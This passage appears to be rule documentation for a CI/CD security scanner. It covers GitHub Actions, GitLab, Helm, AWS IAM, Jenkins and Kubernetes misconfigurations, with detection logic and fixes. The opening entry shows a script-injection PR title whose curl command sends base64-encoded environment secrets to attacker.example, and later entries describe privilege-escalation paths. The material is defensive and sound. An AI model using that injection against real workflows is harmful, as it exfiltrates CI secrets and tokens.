Attack: open a PR with the title:
# foo"; curl -X POST https://attacker.example/exfil \
-d "$(env | base64 -w0)"; echo "
GitHub expands ${{ ... }} BEFORE shell quoting, so the
title's " closes the echo string and the rest of the line
becomes shell. The pull_request_target trigger means the
runner already has secrets and a write-scope GITHUB_TOKEN,
so the curl exfils every secret the workflow can see.
Safe: route through env so the value is never interpolated
into the shell template:
- env:
PR_TITLE: ${{ github.event.pull_request.title }}
run: |
echo "New PR: $PR_TITLE"
Source: GHA-003 in the GitHub Actions provider.
GHA-004: Workflow has no explicit permissions block MEDIUM 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. Without an explicit permissions: block (either top-level or per-job), the GITHUB_TOKEN inherits the repository's default scope, typically write. A compromised step receives far more privilege than it needs.
Recommendation. Add a top-level permissions: block (start with contents: read) and grant additional scopes only on the specific jobs that need them.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Read-only / lint-only workflows that do not call any write-scoped API often pass without an explicit block because the default token scope on public repos is read. The rule defaults to MEDIUM confidence to reflect this.
Source: GHA-004 in the GitHub Actions provider.
GHA-005: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets in GitHub Actions can't be rotated on a fine-grained schedule and remain valid until manually revoked. OIDC with role-to-assume yields short-lived credentials per workflow run.
Recommendation. Use aws-actions/configure-aws-credentials with role-to-assume + permissions: id-token: write to obtain short-lived credentials via OIDC. Remove the static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- LocalStack and Moto integration tests set
AWS_ENDPOINT_URLto a localhost address and use the sentineltest/testaccess keys (the LocalStack convention). Those values can't authenticate against real AWS, so the rule auto-suppresses an env block that pairs a localhost endpoint with sentinel keys.
Source: GHA-005 in the GitHub Actions provider.
GHA-034: Reusable workflow called with secrets: inherit MEDIUM 🔧 fix
Evidences: AC-6 Least Privilege, IA-5 Authenticator Management.
How this is detected. Fires on a jobs.<id>.uses: ... reference whose sibling secrets: value is the literal string inherit. This is distinct from GHA-025 (which gates on the pin of the called workflow): inheritance is a problem even when the call is SHA-pinned, because the surface a compromised callee sees is every caller secret instead of just the named ones. Explicit lists also document the contract, reviewers see exactly which secrets cross the workflow boundary.
Recommendation. Replace secrets: inherit with an explicit list of just the secrets the called workflow actually needs (secrets: { NPM_TOKEN: ${{ secrets.NPM_TOKEN }} }). inherit passes every secret the caller can see, including ones the downstream workflow has no business reading. A compromised or buggy reusable workflow can then exfiltrate credentials the caller never intended to share.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Single-tenant repos that share their entire secrets set with every reusable workflow by policy. Rare in practice, explicit lists make the secret flow visible and don't add much typing. Suppress with
.pipelinecheckignoreand a rationale rather than disabling the rule everywhere.
Source: GHA-034 in the GitHub Actions provider.
GHA-035: github-script step interpolates untrusted context HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SI-7 Software, Firmware, and Information Integrity.
How this is detected. GHA-003 covers run: blocks where shell expansion is the injection surface. actions/github-script@<ref> runs the script: input as Node.js inside an authenticated Octokit context, same threat model, different language. The rule fires when script: (or the legacy previews: companion for inline JS) contains a ${{ github.event.* }}, ${{ inputs.* }}, ${{ github.head_ref }}, ${{ github.ref_name }}, or any other untrusted context expression, exactly the same catalog GHA-003 uses.
Recommendation. Pass attacker-controllable values through env: and read them inside the script via process.env.X instead of interpolating ${{ ... }} directly into the script body. GitHub expands the expression before the JavaScript engine parses the source, so backticks, quotes, and ${...} characters in the source field break out of the surrounding string and execute as JavaScript with the workflow's GITHUB_TOKEN in scope.
Known false positives.
- Scripts that interpolate
${{ steps.*.outputs.* }}from a trusted upstream step are out of scope (the rule only matches the curated untrusted-context regex). If you intentionally rely on a non-curated context, suppress with a brief.pipelinecheckignorerationale.
Source: GHA-035 in the GitHub Actions provider.
GL-001: Image not pinned to specific version or digest HIGH 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Floating tags (latest or major-only) can be silently swapped under the job. Every image: reference should pin a specific version tag or digest.
Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag (e.g. python:3.12.1-slim). Avoid :latest and bare tags like :3.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-001 in the GitLab CI provider.
GL-002: Script injection via untrusted commit/MR context HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SI-7 Software, Firmware, and Information Integrity.
How this is detected. CI_COMMIT_MESSAGE / CI_COMMIT_REF_NAME / CI_MERGE_REQUEST_TITLE and friends are populated from SCM event metadata the attacker controls. Interpolating them into a shell body executes the crafted content as part of the build.
Recommendation. Read these values into intermediate variables: entries or shell variables and quote them defensively ("$BRANCH"). Never inline $CI_COMMIT_MESSAGE / $CI_MERGE_REQUEST_TITLE into a shell command.
Source: GL-002 in the GitLab CI provider.
GL-003: Variables contain literal secret values CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Scans variables: at the top level and on each job for entries whose KEY looks credential-shaped and whose VALUE is a literal string (not a $VAR reference). AWS access keys are detected by value pattern regardless of key name.
Recommendation. Store credentials as protected + masked CI/CD variables in project or group settings, and reference them by name from the YAML. For cloud access prefer short-lived OIDC tokens.
Source: GL-003 in the GitLab CI provider.
GL-004: Deploy job lacks manual approval or environment gate MEDIUM
Evidences: AC-3 Access Enforcement, SA-10 Developer Configuration Management.
How this is detected. A job whose stage or name contains deploy / release / publish / promote should either require manual approval or declare an environment: binding. Otherwise any push to the trigger branch ships to the target.
Recommendation. Add when: manual (optionally with rules: for protected branches) or bind the job to an environment: with a deployment tier so approvals and audit are enforced by GitLab's environment controls.
Source: GL-004 in the GitLab CI provider.
GL-005: include: pulls remote / project without pinned ref HIGH
Evidences: CM-6 Configuration Settings, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Cross-project and remote includes can be silently re-pointed. Branch-name refs (main/master/develop/head) are treated as unpinned; tag and SHA refs are considered safe.
Recommendation. Pin include: project: entries with ref: set to a tag or commit SHA. Avoid include: remote: for untrusted URLs; mirror the content into a trusted project and pin it.
Source: GL-005 in the GitLab CI provider.
HELM-001: Chart.yaml declares legacy apiVersion: v1 MEDIUM 🔧 fix
Evidences: CM-2 Baseline Configuration, SR-3 Supply Chain Controls and Processes.
How this is detected. apiVersion lives at the top of Chart.yaml. v1 is Helm 2's format and uses a sibling requirements.yaml for dependencies; v2 is Helm 3's format and inlines them in Chart.yaml alongside a Chart.lock for digest pinning. Without v2 there is no in-tree dependency manifest to lock, which is why HELM-002 only fires on v2 charts.
Recommendation. Bump Chart.yaml to apiVersion: v2 and migrate any sibling requirements.yaml entries into the dependencies: list inside Chart.yaml. Run helm dependency update to regenerate Chart.lock so HELM-002's per-dependency digest check has something to read. Helm 3 has been the default shipping channel since November 2019; the v1 format is kept for read-compat but blocks lockfile-based supply-chain controls.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-001 in the Helm provider.
HELM-002: Chart.lock missing per-dependency digests HIGH 🔧 fix
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Three failure shapes:
Chart.yamldeclares dependencies but noChart.lockexists at all.Chart.lockexists but itsdependencies:list is missing entries declared inChart.yaml(drift after an edit without re-runninghelm dependency update).Chart.locklists every dependency but one or more entries lack adigest:field (lock generated by an old Helm 3 version that didn't always populate it).
v1 charts (HELM-001) are skipped. They predate Chart.lock and use requirements.lock against a sibling requirements.yaml. Fix HELM-001 first.
Recommendation. After every change to dependencies: in Chart.yaml, re-run helm dependency update and commit the regenerated Chart.lock. The lock records the resolved version and a sha256:... digest that helm dependency build verifies on download, without it, a compromised chart repo can swap the tarball under the same version and helm install will happily use the substitute.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Charts with no dependencies (the
dependencies:key is absent or empty) pass automatically. There is nothing to lock.
Source: HELM-002 in the Helm provider.
HELM-003: Chart dependency declared on a non-HTTPS repository HIGH 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity, SC-13 Cryptographic Protection, SR-3 Supply Chain Controls and Processes.
How this is detected. Walks Chart.yaml dependencies: (v2 charts only) and inspects each entry's repository: URL. Accepted schemes:
https://, chart-museum / OSS chart repos. The default for public Helm charts.oci://, registry-hosted charts. TLS is enforced by the registry, not the URL scheme; we still accept this shape because Helm 3.8+ pulls OCI charts over HTTPS unless explicitly configured otherwise.file://, in-repo dependency. No network surface.@alias, local alias for a previously registeredhelm repo addURL. The scheme of the original URL is the user's responsibility (and is captured in the chart consumer's~/.config/helm/repositories.yaml).
Recommendation. Switch each dependencies[].repository value to an https:// chart repo URL, an oci:// registry reference, or a file:// path for in-repo charts. Plaintext http:// (and other non-TLS schemes like git://) lets any on-path attacker substitute the dependency tarball during helm dependency build; Chart.lock's digest check (HELM-002) only catches that on the next update, not the compromised pull itself.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-003 in the Helm provider.
HELM-004: Chart dependency version is a range, not an exact pin MEDIUM
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. An exact pin is a string that contains only digits, dots, and at most a single leading v / trailing pre-release or build identifier (1.2.3, v1.2.3, 1.2.3-rc1, 1.2.3+build.5). Anything carrying ^ / ~ / > / < / * / x / X / || / a space (>=4 <5) is treated as a range. The bias is toward false positives, a chart maintainer can suppress per-rule via --ignore-file if they specifically want range semantics, but the default for production charts is a pin.
Recommendation. Replace each dependencies[].version constraint with the exact resolved version from Chart.lock. 17.0.0 instead of ^17.0.0, v1.2.3 instead of ~1.2. Range syntax (^, ~, >=, *, x) lets helm dependency update move every consumer of the chart to a newer dep on the next refresh, even when the lock file looked stable.
Source: HELM-004 in the Helm provider.
HELM-005: Chart maintainers field empty or missing chain-of-custody info LOW
Evidences: SR-3 Supply Chain Controls and Processes, SR-4 Provenance.
How this is detected. An maintainers: entry is considered usable when the value is a YAML mapping with name: set to a non-empty string and at least one of email: / url: populated. Entries that look like - name: TODO or carry blank contact fields fail the rule the same way a missing block does, the field exists but doesn't carry a real chain-of-custody signal.
Recommendation. Populate maintainers: in Chart.yaml with at least one entry carrying a name plus either an email or a url. The name is the human a downstream consumer files an issue against; the contact field is the channel they reach. Charts published to ArtifactHub or an internal registry without this field are silently anonymous, fine for a personal scratch chart, not for one your CI pipeline will deploy to production.
Known false positives.
- Library charts (
Chart.yamltype: library) often ship without maintainers when distributed inside a single team's monorepo where the org-level CODEOWNERS already names the contact. Suppress with--ignore-filewhen this matches your situation.
Source: HELM-005 in the Helm provider.
HELM-006: Chart.yaml does not declare a kubeVersion compatibility range LOW
Evidences: CM-2 Baseline Configuration, CM-6 Configuration Settings.
How this is detected. The field is a string carrying a Helm-flavoured SemVer range. Empty / missing fails the rule. Whitespace-only values fail too, an obviously-blank key should not satisfy a posture check.
Recommendation. Add a kubeVersion: SemVer range to Chart.yaml covering the Kubernetes versions you've actually rendered and tested the chart against. >= 1.25.0 < 1.32.0 is the common shape for a chart maintained against the upstream support window. Helm will refuse helm install against a cluster whose kubectl version falls outside the range, catching silent-breakage surprises (removed apiVersions, renamed RBAC verbs, alpha features) at pre-flight rather than at runtime.
Known false positives.
- Library charts (
Chart.yamltype: library) that wrap version-agnostic helpers often legitimately ship withoutkubeVersion. Suppress with--ignore-filewhen the chart genuinely targets every supported Kubernetes minor.
Source: HELM-006 in the Helm provider.
HELM-007: Chart.yaml description field is empty or missing LOW
Evidences: SR-3 Supply Chain Controls and Processes.
How this is detected. Walks Chart.yaml description: and fires when the field is missing, None, or a string that's empty after stripping whitespace. The Helm chart spec doesn't enforce the field but every chart published to ArtifactHub or the upstream stable repo populates it; production charts that ship without it are usually a copy-paste-from-template oversight.
Recommendation. Set description: in Chart.yaml to a one-sentence summary of what the chart deploys (e.g. description: Postgres 14 cluster with WAL-G backups and a Prometheus exporter). Helm registries display this string in chart listings; without it, anyone browsing has to read the README to figure out what the chart does.
Source: HELM-007 in the Helm provider.
HELM-008: Chart.lock generated more than 90 days ago MEDIUM
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes.
How this is detected. Reads Chart.lock's top-level generated: timestamp (an ISO-8601 string Helm writes when the lock was last regenerated) and compares against now. Fires when the delta is more than 90 days. Charts without Chart.lock are skipped. HELM-002 covers the missing-lock case directly. Charts whose generated: field is malformed or absent silently pass on this rule (HELM-002 covers the absent-lock case from a different angle).
Recommendation. Run helm dependency update against every dependency-carrying chart at least once per release cycle, and commit the regenerated Chart.lock. The lock pins versions and digests; the update cadence is what brings in CVE fixes and deprecation notices from the last quarter. CI can run the same command against main weekly to surface drift as a PR rather than letting the lock sit stale until the next release.
Known false positives.
- A chart that pins exact versions and never needs new dependencies (e.g. a chart packaging a single internal library that itself updates rarely) may legitimately have a stale Chart.lock. Suppress with
--ignore-filewhen this matches your situation.
Source: HELM-008 in the Helm provider.
HELM-009: Chart home / sources URL uses a non-HTTPS scheme LOW
Evidences: SC-8 Transmission Confidentiality and Integrity, SR-3 Supply Chain Controls and Processes.
How this is detected. Walks Chart.yaml home: (single string) and sources: (list of strings). Fires on any value whose scheme is http://, ftp://, or other plaintext form. Empty / missing fields pass, the rule only evaluates URLs that are populated with the wrong scheme. HELM-003 covers the same risk for dependency-repo URLs.
Recommendation. Switch every home: URL and every entry in sources: to https://. Most chart-listing UIs display these as click-through links from a public chart registry; serving them over plaintext is a confused-deputy footgun for anyone evaluating the chart's provenance. http:// URLs against localhost are not exempted, production charts shouldn't ship references to a developer-local endpoint anyway.
Source: HELM-009 in the Helm provider.
HELM-010: Chart.yaml appVersion field is empty or missing LOW
Evidences: CM-2 Baseline Configuration.
How this is detected. Library charts (Chart.yaml type: library) legitimately don't have an appVersion because they package no application. Those are exempted. For application charts (type: application, the default), appVersion is required for CVE tracking and release-tracking; without it, helm list shows - in the AppVersion column and downstream consumers have no signal.
Recommendation. Set appVersion: in Chart.yaml to the version of the application the chart packages (e.g. appVersion: "17.2" for a Postgres-17.2 chart at version: 1.4.2). When the upstream application releases, bump appVersion and re-cut the chart. Helm's CLI displays appVersion alongside the chart version in helm list, so downstream operators can see which app version is running where.
Source: HELM-010 in the Helm provider.
IAM-001: CI/CD role has AdministratorAccess policy attached CRITICAL
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. A CI/CD service role with AdministratorAccess attached turns any pipeline compromise into account compromise. The classic anti-pattern: the role started narrow, the pipeline grew, someone attached AdministratorAccess to unblock a deploy, and it never came off.
Recommendation. Replace AdministratorAccess with least-privilege policies.
Source: IAM-001 in the AWS provider.
IAM-002: CI/CD role has wildcard Action in attached policy HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. Action: '*' (or service-prefix wildcards like s3:*) on an attached policy is functionally equivalent to AdministratorAccess for that resource. The wildcard absorbs every new IAM action AWS adds, so the role's authority grows without any local change.
Recommendation. Replace wildcard actions with specific IAM actions.
Source: IAM-002 in the AWS provider.
IAM-003: CI/CD role has no permission boundary MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. A permissions boundary is the maximum-permission ceiling for a role. Without one, every future PR that attaches another inline / managed policy raises the role's effective authority indefinitely. With a boundary in place, the policy churn happens beneath a fixed cap that your security team owns separately.
Recommendation. Attach a permissions boundary defining max permissions.
Source: IAM-003 in the AWS provider.
IAM-004: CI/CD role can PassRole to any role HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. iam:PassRole with Resource: '*' lets the principal hand any role to any service. Combined with a service that runs your code (Lambda, ECS, CodeBuild, EC2 Instance Profiles), this is role-hop privilege escalation: launch an ephemeral resource configured with a higher-privileged role, run code under that identity, exfil. Scoping by ARN + iam:PassedToService removes the escalation path.
Recommendation. Restrict iam:PassRole to specific role ARNs and add an iam:PassedToService condition.
Source: IAM-004 in the AWS provider.
IAM-005: CI/CD role trust policy missing sts:ExternalId HIGH
Evidences: AC-2 Account Management, AC-3 Access Enforcement.
How this is detected. A trust policy that lets an external AWS account assume the role without an sts:ExternalId condition is vulnerable to the confused-deputy pattern: a third-party SaaS configured with your role ARN can also be used by another customer of that SaaS to assume your role (if they know the ARN). sts:ExternalId ties the role to a specific tenancy.
Recommendation. Add a Condition requiring sts:ExternalId for external principals.
Source: IAM-005 in the AWS provider.
IAM-006: Sensitive actions granted with wildcard Resource MEDIUM
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. IAM-002 catches Action: "*". IAM-006 catches the more common "scoped action, unscoped resource" pattern on sensitive services (S3/KMS/SecretsManager/SSM/IAM/STS/DynamoDB/Lambda/EC2).
Recommendation. Scope the Resource element to specific ARNs (buckets, keys, secrets, roles).
Source: IAM-006 in the AWS provider.
JF-001: Shared library not pinned to a tag or commit HIGH
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. @main, @master, @develop, no-@ref, and any non-semver / non-SHA ref are floating. Whoever controls the upstream library can ship code into your build by pushing to that branch.
Recommendation. Pin every @Library('name@<ref>') to a release tag (e.g. @v1.4.2) or a 40-char commit SHA. Configure the library in Jenkins with 'Allow default version to be overridden' disabled so a pipeline can't escape the pin.
Source: JF-001 in the Jenkins provider.
JF-004: AWS auth uses long-lived access keys via withCredentials MEDIUM 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Fires when BOTH a credentialsId containing aws is referenced AND an AWS key variable name appears (requires both so an OIDC role binding doesn't false-positive). Also fires when withAWS(credentials: '…') is used, the safe alternative is withAWS(role: '…').
Recommendation. Switch to the AWS plugin's IAM-role / OIDC binding (e.g. withAWS(role: 'arn:aws:iam::…:role/jenkins')) so each build assumes a short-lived role. Remove the static AWS_ACCESS_KEY_ID secret from the Jenkins credentials store once the role is in place.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-004 in the Jenkins provider.
JF-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Scans the raw Jenkinsfile text against the cross-provider credential-pattern catalog. Secrets committed to Groovy source are visible in every fork and every build log.
Recommendation. Rotate the exposed credential. Move the value to a Jenkins credential and reference it via withCredentials([string(credentialsId: '…', variable: '…')]).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example
AKIAIOSFODNN7EXAMPLEis deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: JF-008 in the Jenkins provider.
JF-010: Long-lived AWS keys exposed via environment {} block HIGH 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Flags environment { AWS_ACCESS_KEY_ID = '...' } when the value is a literal or plain variable reference. Skips credentials('id') helpers and ${env.X} that resolve at runtime. Matches both multiline and inline environment { ... } forms.
Recommendation. Replace the literal with a credentials-store reference: AWS_ACCESS_KEY_ID = credentials('aws-prod-key'). Better: switch to the AWS plugin's role binding (withAWS(role: 'arn:…')) so the build assumes a short-lived role per run.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-010 in the Jenkins provider.
JF-011: Pipeline has no buildDiscarder retention policy LOW 🔧 fix
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. Without a retention policy, build logs accumulate indefinitely; a secret that once leaked into a log stays visible to anyone who can read jobs. Recognises declarative options { buildDiscarder(...) }, scripted properties([buildDiscarder(...)]), and bare logRotator(...).
Recommendation. Add options { buildDiscarder(logRotator(numToKeepStr: '30', daysToKeepStr: '90')) } (declarative) or the properties([buildDiscarder(...)]) equivalent in scripted pipelines. Tune the numbers to your retention policy.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-011 in the Jenkins provider.
JF-015: Pipeline has no timeout wrapper, unbounded build MEDIUM 🔧 fix
Evidences: CM-6 Configuration Settings.
How this is detected. Without a timeout() wrapper, the pipeline runs until the Jenkins controller's global timeout (or indefinitely if none is configured). Explicit timeouts cap blast radius and the window during which a compromised step has workspace access.
Recommendation. Wrap the pipeline body or individual stages with timeout(time: N, unit: 'MINUTES') { … }. Without an explicit timeout, the build runs until the Jenkins global default (or indefinitely).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-015 in the Jenkins provider.
K8S-001: Container image not pinned by sha256 digest HIGH 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Reuses _primitives.image_pinning.classify so the floating-tag semantics match DF-001 / GL-001 / JF-009 / ADO-009 / CC-003. Even a PINNED_TAG like nginx:1.25.4 is treated as unpinned, only an explicit @sha256: survives, since a tag is mutable on the registry side and Kubernetes will happily pull the new content on a node restart.
Recommendation. Resolve every workload container image to its current digest (crane digest <ref> or docker buildx imagetools inspect) and pin via image: repo@sha256:<digest>. Floating tags (:latest, :3, no tag) silently swap the running image on the next rollout, breaking provenance and reproducibility.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-001 in the Kubernetes provider.
K8S-002: Pod hostNetwork: true HIGH 🔧 fix
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. Compromised containers on hostNetwork can sniff or interfere with traffic from every other pod on the node. Reserve the flag for system DaemonSets that genuinely require it (CNI agents, ingress data planes); applications never need it.
Recommendation. Set spec.hostNetwork: false (the default) on every workload. hostNetwork: true puts the pod directly on the node's network namespace, exposing every host-bound listener to the container and bypassing CNI network policies.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-002 in the Kubernetes provider.
K8S-003: Pod hostPID: true HIGH 🔧 fix
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. There is no application use case for hostPID. Only specialised node agents (process exporters, debuggers) legitimately need it, and those are typically deployed via a system DaemonSet with an explicit security review.
Recommendation. Set spec.hostPID: false (the default) on every workload. hostPID: true makes every host process visible inside the container, and combined with privileged execution allows trivial escape via nsenter / /proc/<pid>/root.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-003 in the Kubernetes provider.
K8S-004: Pod hostIPC: true HIGH 🔧 fix
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. Modern applications coordinate via gRPC / sockets, never via host IPC. Treat this flag as a strong red flag in code review unless paired with a documented system-level use case.
Recommendation. Set spec.hostIPC: false (the default) on every workload. hostIPC: true lets the container read and write the host's shared-memory segments and POSIX message queues, exposing data exchanged by every other process on the node.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-004 in the Kubernetes provider.
K8S-005: Container securityContext.privileged: true CRITICAL 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. privileged: true is the strongest possible escalation in Kubernetes. It overrides every other securityContext setting and is the single largest cluster-takeover vector after RBAC misconfiguration.
Recommendation. Remove securityContext.privileged: true from every container. A privileged container has full access to the host's devices and capabilities, escape to the node is trivial. If the workload genuinely needs a kernel capability, grant only that capability via capabilities.add rather than enabling privileged mode.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-005 in the Kubernetes provider.
K8S-006: Container allowPrivilegeEscalation not explicitly false HIGH 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. The default for non-root containers is True (Pod Security Standard 'baseline' allows this; 'restricted' does not). An explicit false is required because Kubernetes treats an unset field as a deferral to the cluster admission controller, which may not enforce restricted.
Recommendation. Set securityContext.allowPrivilegeEscalation: false on every container. The Linux no_new_privs flag stops setuid binaries and capabilities from gaining elevated privileges, without this, a compromised process can escape via setuid utilities still installed in many base images.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-006 in the Kubernetes provider.
K8S-007: Container runAsNonRoot not true / runAsUser is 0 HIGH 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. A container is considered safe when EITHER its own securityContext OR the pod-level securityContext sets runAsNonRoot: true and a non-zero runAsUser. An explicit runAsUser: 0 always fails, even if runAsNonRoot is unset.
Recommendation. Set securityContext.runAsNonRoot: true and runAsUser: <non-zero UID> on every container, OR set the same fields at pod level so all containers inherit. Running as UID 0 inside a container makes container-escape exploits dramatically more dangerous, the attacker already has root inside the container, so any kernel CVE that matters becomes immediately exploitable.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-007 in the Kubernetes provider.
K8S-008: Container readOnlyRootFilesystem not true MEDIUM 🔧 fix
Evidences: CM-6 Configuration Settings, SC-28 Protection of Information at Rest.
How this is detected. Many post-exploitation toolchains (cryptominers, persistence implants, shell-callbacks) assume a writable root. Locking it down forces the attacker to use distroless or runtime tmpfs they can't easily place.
Recommendation. Set securityContext.readOnlyRootFilesystem: true on every container. A read-only root filesystem stops attackers from dropping additional payloads into /tmp, /var, or writable system paths. Mount tmpfs emptyDir volumes for the directories the application genuinely needs to write to.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-008 in the Kubernetes provider.
K8S-009: Container capabilities not dropping ALL / adding dangerous caps HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Fails when the container does NOT drop ALL or when capabilities.add includes any of: SYS_ADMIN, NET_ADMIN, SYS_PTRACE, SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE, SYS_RAWIO, SYS_BOOT, BPF, PERFMON, or the literal ALL.
Recommendation. Drop every capability and add back only what the workload actually needs:
securityContext:
capabilities:
drop: ["ALL"]
add: ["NET_BIND_SERVICE"] # only if binding <1024
Most stateless services need no capabilities at all. Avoid SYS_ADMIN (effectively root), SYS_PTRACE (process snooping), NET_ADMIN (raw socket access), and SYS_MODULE (kernel module loading).
Source: K8S-009 in the Kubernetes provider.
K8S-010: Container seccompProfile not RuntimeDefault or Localhost MEDIUM
Evidences: CM-6 Configuration Settings, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Pod-level securityContext.seccompProfile covers all containers in the pod. Either path passes this rule. The default of Unconfined (or unset, which inherits the node default, usually Unconfined) fails.
Recommendation. Set securityContext.seccompProfile.type: RuntimeDefault (or Localhost with a path to your tuned profile) at either pod or container level. Without seccomp, every syscall is reachable from the container, modern kernel CVEs (e.g. io_uring) become trivially exploitable.
Source: K8S-010 in the Kubernetes provider.
K8S-011: Pod serviceAccountName unset or 'default' MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. Both an unset serviceAccountName (which defaults to default) and an explicit serviceAccountName: default fail the rule. Pair this with K8S-012 to also disable token auto-mounting where the workload doesn't need API access.
Recommendation. Bind every workload to a dedicated, narrow ServiceAccount. The 'default' SA exists in every namespace and tends to accrete RoleBindings over time, using it gives the workload every privilege any other service in the namespace ever needed. Create a per-workload SA with the minimum RBAC needed and reference it via spec.serviceAccountName.
Source: K8S-011 in the Kubernetes provider.
K8S-012: Pod automountServiceAccountToken not false MEDIUM
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. An unset value defaults to True in Kubernetes. This rule fails on unset because most application workloads do NOT need API access and the default exposes credentials by accident. Workloads that explicitly call the API should set the field to true so the choice is visible in code review.
